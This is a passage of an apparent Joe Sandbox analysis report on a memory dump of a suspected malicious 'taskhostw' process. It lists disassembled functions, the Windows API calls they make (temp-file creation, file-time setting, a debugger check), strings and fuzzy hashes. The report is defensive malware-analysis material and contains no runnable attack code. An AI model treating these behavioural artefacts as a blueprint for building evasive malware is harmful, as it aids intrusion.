__fread_nolock.LIBCMT ref: 00D58E6A

Strings

EA06, xrefs: 00D58E9C

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: a9474766a742a939996df02ebe80974b62942cc943591b64a7bc7c930892ee50
Instruction ID: f55646c1f2417f2c22a85ca766604d040edcbd9fa77b48553d22e3e37213afbc
Opcode Fuzzy Hash: a9474766a742a939996df02ebe80974b62942cc943591b64a7bc7c930892ee50
Instruction Fuzzy Hash: 4401F971C04218BEDB28C7A8D817EEE7BF8DF01301F00459AF552D2181E9B9E6089770

Function 00D5998C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00D599A1
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00D599B8

Strings

aut, xrefs: 00D599B2

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: aa40b9807a62acab4591fd57ed9fbfe80862859f211a80fd07f8f277e6b7cb3e
Instruction ID: 1287ff9ce0e56f2b989162c291e4d64f5f666e33ee72972a6f878d12add598a2
Opcode Fuzzy Hash: aa40b9807a62acab4591fd57ed9fbfe80862859f211a80fd07f8f277e6b7cb3e
Instruction Fuzzy Hash: 81D05B7554030D6BDB609BA0DC0EF96773CE704704F0002B1BE54D11A1FE7055989BA5

Function 00D6CBF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01d47228f77238f253dc597c403dcf0a53bee07da984662769aa788b9b94c71c
Instruction ID: 0aa183f80c7024b0758083d3e4bcb58761d939e7251953f3bec13dfa133fbd6b
Opcode Fuzzy Hash: 01d47228f77238f253dc597c403dcf0a53bee07da984662769aa788b9b94c71c
Instruction Fuzzy Hash: A1F14C70A083059FCB14DF28C480A6ABBE5FF88314F14892EF9999B351D771E945CFA2

Function 00CF43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CF4401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00CF44A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00CF44C3

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: a4a80ebe9c56cf7d926eac4dbda8d8f319f5304282b9bbef5e1237f76c00a272
Instruction ID: 4f433d82bca487e6e57e7be4468a926b4c87067181a284f06f3a2242d0026629
Opcode Fuzzy Hash: a4a80ebe9c56cf7d926eac4dbda8d8f319f5304282b9bbef5e1237f76c00a272
Instruction Fuzzy Hash: BD316F70505705DFD764DF24E8847ABBBE4EB48308F00092EE69AD2251D7716A44CBA6

Function 00D1588C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00D158A3

Part of subcall function 00D1A2EB: __NMSG_WRITE.LIBCMT ref: 00D1A312
Part of subcall function 00D1A2EB: __NMSG_WRITE.LIBCMT ref: 00D1A31C

__NMSG_WRITE.LIBCMT ref: 00D158AA

Part of subcall function 00D1A348: GetModuleFileNameW.KERNEL32(00000000,00DB33BA,00000104,?,00000001,00000000), ref: 00D1A3DA
Part of subcall function 00D1A348: ___crtMessageBoxW.LIBCMT ref: 00D1A488

Part of subcall function 00D1321F: ___crtCorExitProcess.LIBCMT ref: 00D13225
Part of subcall function 00D1321F: ExitProcess.KERNEL32 ref: 00D1322E

Part of subcall function 00D18CA8: __getptd_noexit.LIBCMT ref: 00D18CA8

RtlAllocateHeap.NTDLL(00670000,00000000,00000001,00000000,?,?,?,00D10F53,?), ref: 00D158CF

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 502b6d690d0056587cff813d8fd25a4fadaadca5a2525efa47bd66b87c367f17
Instruction ID: da70af842ead5840d49954802fcd5a0250481916b3b1e01b1ba2c48571b9ae00
Opcode Fuzzy Hash: 502b6d690d0056587cff813d8fd25a4fadaadca5a2525efa47bd66b87c367f17
Instruction Fuzzy Hash: 3C01D235251B01FAEA102774BC42AEE7349DFC2770B14012AF401EA281DE748DC05A75

Function 00D5994B Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00D59964
SetFileTime.KERNEL32(00000000,?,00000000,?,?,00D595F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00D5997A
CloseHandle.KERNEL32(00000000), ref: 00D59981

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 7bcbffb219175128a0f5b073716f4e9a882fa176fd375df27c707c6cbbec8b9f
Instruction ID: d72becdc5505845db7ee1dfbd98a90b9d20252c3c17135760fc3db651d92c9c4
Opcode Fuzzy Hash: 7bcbffb219175128a0f5b073716f4e9a882fa176fd375df27c707c6cbbec8b9f
Instruction Fuzzy Hash: 8BE08632141314F7DB311B64EC0AFDA7B58AB05761F144220FF58B91E097B129519BA8

Function 00D58DB6 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D58DC4

Part of subcall function 00D12ED5: HeapFree.KERNEL32(00000000,00000000), ref: 00D12EE9
Part of subcall function 00D12ED5: GetLastError.KERNEL32(00000000,?,00D19BA4), ref: 00D12EFB

_free.LIBCMT ref: 00D58DD5
_free.LIBCMT ref: 00D58DE7

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3221efda5ec1aeb3564d3aaca8a62a8878e7642d45a62f0f0d26450024f2f6e1
Instruction ID: 2843db35b6682c69e1def869d3bbb6f61073a862adb575c65f021b45846d0c47
Opcode Fuzzy Hash: 3221efda5ec1aeb3564d3aaca8a62a8878e7642d45a62f0f0d26450024f2f6e1
Instruction Fuzzy Hash: A9E012A170170557DE2465787940EE323EC9F58362718081EBC09E7982CE24E8D59134

Function 00CFAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00D2FF5A

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 357c237806ecbf0052d4f4c537b6b9e8e1948564876c959711fd37056adf2352
Instruction ID: c224b817dd2ffe043a8c01cf0790b04a18131f3b90a2760d686d97555050d8bf
Opcode Fuzzy Hash: 357c237806ecbf0052d4f4c537b6b9e8e1948564876c959711fd37056adf2352
Instruction Fuzzy Hash: 4F2237B0508205DFCB64DF14C490B6ABBE1FF84304F15896DE99A8B261DB31ED85DBA3

Function 00CF4DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CF4E1A

Strings

EA06, xrefs: 00D2DC25

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: cafb02b4591b5b77d7aa75dfd120145cb8da0fc98c3bf5e665850ee9e1cbd669
Instruction ID: 519315b71d663195005728c13eec12e621b2022d5b1cbb355d67de590b3c3e01
Opcode Fuzzy Hash: cafb02b4591b5b77d7aa75dfd120145cb8da0fc98c3bf5e665850ee9e1cbd669
Instruction Fuzzy Hash: E9417C21A0415C5BCF699B6498527BFBFA6AF05300F684064EF869B182C6318E45D7F3

Function 00CF7BB1 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CF7C0B
_memmove.LIBCMT ref: 00CF7C76

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 084565aa62bfc32a06c2ea2f515da3e1e66857a7f87005b1dff01ade52e77ddf
Instruction ID: 304cf57c288f94c3b1f1d054d6ea27acb7cbda228974725151731fb64b857905
Opcode Fuzzy Hash: 084565aa62bfc32a06c2ea2f515da3e1e66857a7f87005b1dff01ade52e77ddf
Instruction Fuzzy Hash: 2B31C2B160450AAFC714DF28D9D1E69F7A8FF483207158729E625CB291DB70E961CBA0

Function 00CF492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00CF4992

Part of subcall function 00D134EC: __lock.LIBCMT ref: 00D134F2
Part of subcall function 00D134EC: DecodePointer.KERNEL32(00000001,?,00CF49A7,00D47F9C), ref: 00D134FE
Part of subcall function 00D134EC: EncodePointer.KERNEL32(?,?,00CF49A7,00D47F9C), ref: 00D13509

Part of subcall function 00CF4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000,00000000,?,0069A268,?,00CF49BA), ref: 00CF4A73
Part of subcall function 00CF4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?,0069A268,?,00CF49BA), ref: 00CF4A88

Part of subcall function 00CF3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CF3B7A
Part of subcall function 00CF3B4C: IsDebuggerPresent.KERNEL32 ref: 00CF3B8C
Part of subcall function 00CF3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00DB52F8,00DB52E0,?,?), ref: 00CF3BFD
Part of subcall function 00CF3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00CF3C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00CF49D2

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 95b1fffe69770154dd6c9174600413dea5bb89214f7377bfcf5f5513813bce06
Instruction ID: f0016188b29b399e2a30472282a22063ca782fb1ef57bda9d90477dcbb4cb2a6
Opcode Fuzzy Hash: 95b1fffe69770154dd6c9174600413dea5bb89214f7377bfcf5f5513813bce06
Instruction Fuzzy Hash: A5118C71918315DFC704DF69E845A1ABBE8EB84710F00461AF145D33A1DBB0DA48DBA6

Function 00CF5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00CF5E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00D2E0CC

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 944dafffea5feaffcb6da78461347f2f9984ab0bfede554ab507175b28523e3e
Instruction ID: 80fbd0d133affb9bdf1157d65fdcff2fc5db72321d625d3a3def5ce9e53ea855
Opcode Fuzzy Hash: 944dafffea5feaffcb6da78461347f2f9984ab0bfede554ab507175b28523e3e
Instruction Fuzzy Hash: A9019270144708BEF3640E24DC8AF763B9CEB05768F148318BBE55A1E0C6B41E958B61

Function 00D10F36 Relevance: 3.0, APIs: 2, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00D1588C: __FF_MSGBANNER.LIBCMT ref: 00D158A3
Part of subcall function 00D1588C: __NMSG_WRITE.LIBCMT ref: 00D158AA
Part of subcall function 00D1588C: RtlAllocateHeap.NTDLL(00670000,00000000,00000001,00000000,?,?,?,00D10F53,?), ref: 00D158CF

std::exception::exception.LIBCMT ref: 00D10F6C
__CxxThrowException@8.LIBCMT ref: 00D10F81

Part of subcall function 00D1871B: RaiseException.KERNEL32(?,?,?,00DA9E78,00000000,?,?,?,?,00D10F86,?,00DA9E78,?,00000001), ref: 00D18770

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 3b47c5be70c8f6e2162d6841c656d9939acae9321ef0a58e6d4d483361548252
Instruction ID: def812b2a43febd0fc302afb850c042f5ec12ad4a311381352fd7afd96e589d6
Opcode Fuzzy Hash: 3b47c5be70c8f6e2162d6841c656d9939acae9321ef0a58e6d4d483361548252
Instruction Fuzzy Hash: 7AF0817150421DBADB20FA94F816AEE7FECDF01351F104465F90896282DFB08AD5D2F1

Function 00D1576D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D1579C
__lock_file.LIBCMT ref: 00D157BD

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: f5d2026e6bf562b7475b966356e229235d215b8098cd4ecb9e7347d64dc2aa8f
Instruction ID: 85010f12b4c8b4d59fe0b15973ba7a58b160d6cae1ff1ebd5bbcebe3af1f79d6
Opcode Fuzzy Hash: f5d2026e6bf562b7475b966356e229235d215b8098cd4ecb9e7347d64dc2aa8f
Instruction Fuzzy Hash: FF012131901609FBCF21EF69BC024DF7A62EF81360F184255F8245A195DF798AA1EBB1

Function 00D15516 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00D18CA8: __getptd_noexit.LIBCMT ref: 00D18CA8

__lock_file.LIBCMT ref: 00D1555B

Part of subcall function 00D16D8E: __lock.LIBCMT ref: 00D16DB1

__fclose_nolock.LIBCMT ref: 00D15566

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 7129498bfdad7f2ebfc8961fcac0beeb9cbfbd2df9f889a18bd9c443b33451f5
Instruction ID: 4ece38a921c11acd207ccabc3ab67f59f9121bac8babead3631c4b3a5be89eb2
Opcode Fuzzy Hash: 7129498bfdad7f2ebfc8961fcac0beeb9cbfbd2df9f889a18bd9c443b33451f5
Instruction Fuzzy Hash: CAF09631901A00FBE710AF75B8027EE6693AF81331F148245F455AB1C5DF7C89C1AB71

Function 00D19FAB Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32(00000000,00000000,00D19B8E,?,00D19E8B,00000000,00000FA0,00000000,00DAA1A8,00000008,00D19DA2,00000000,00000000,?,00D19BFC,0000000D), ref: 00D19FC4
InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000000,?,00D19E8B,00000000,00000FA0,00000000,00DAA1A8,00000008,00D19DA2,00000000,00000000,?,00D19BFC,0000000D), ref: 00D19FCE

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CriticalInitializeSection$CountSpin
String ID:
API String ID: 4156364057-0
Opcode ID: 79af2d2f65d89cdcbe2474e0f8b2facfe1395cdade97320cc4218d3db284a53a
Instruction ID: 8fb5097641326f1d466c5b32e1d8faea36fcdfb182dc38b234ff1e13985fa020
Opcode Fuzzy Hash: 79af2d2f65d89cdcbe2474e0f8b2facfe1395cdade97320cc4218d3db284a53a
Instruction Fuzzy Hash: 56D0673205424CFFCF029F94FC548A97FAAFF48665B458420F91CC9130D772E5A1AB60

Function 00CF81C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00CF558F,?,?,?,?,?), ref: 00CF81DA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00CF558F,?,?,?,?,?), ref: 00CF820D

Part of subcall function 00CF78AD: _memmove.LIBCMT ref: 00CF78E9

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: 6fceef1fe19ded4019d1987eac8236da33caf9c6ed7564ab926a5041c01818c1
Instruction ID: e3ee8cf420a12e6e5f61d6669e435e8c8a658628159e2dc0bc2da6b860f1b3f3
Opcode Fuzzy Hash: 6fceef1fe19ded4019d1987eac8236da33caf9c6ed7564ab926a5041c01818c1
Instruction Fuzzy Hash: 98018F31205218BFEB246B21EC46F7B3F5CEF89360F10812AFE05CD190DE609840D671

Function 00CFF3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64caf8d3390f7e9c705edbadf9252eb9fb4360bb719554b1407857de7f5cfa76
Instruction ID: 39c64d7a5cfdc6263c326733e6b05529cc11935bcc714f7d958fbb93dd9d657b
Opcode Fuzzy Hash: 64caf8d3390f7e9c705edbadf9252eb9fb4360bb719554b1407857de7f5cfa76
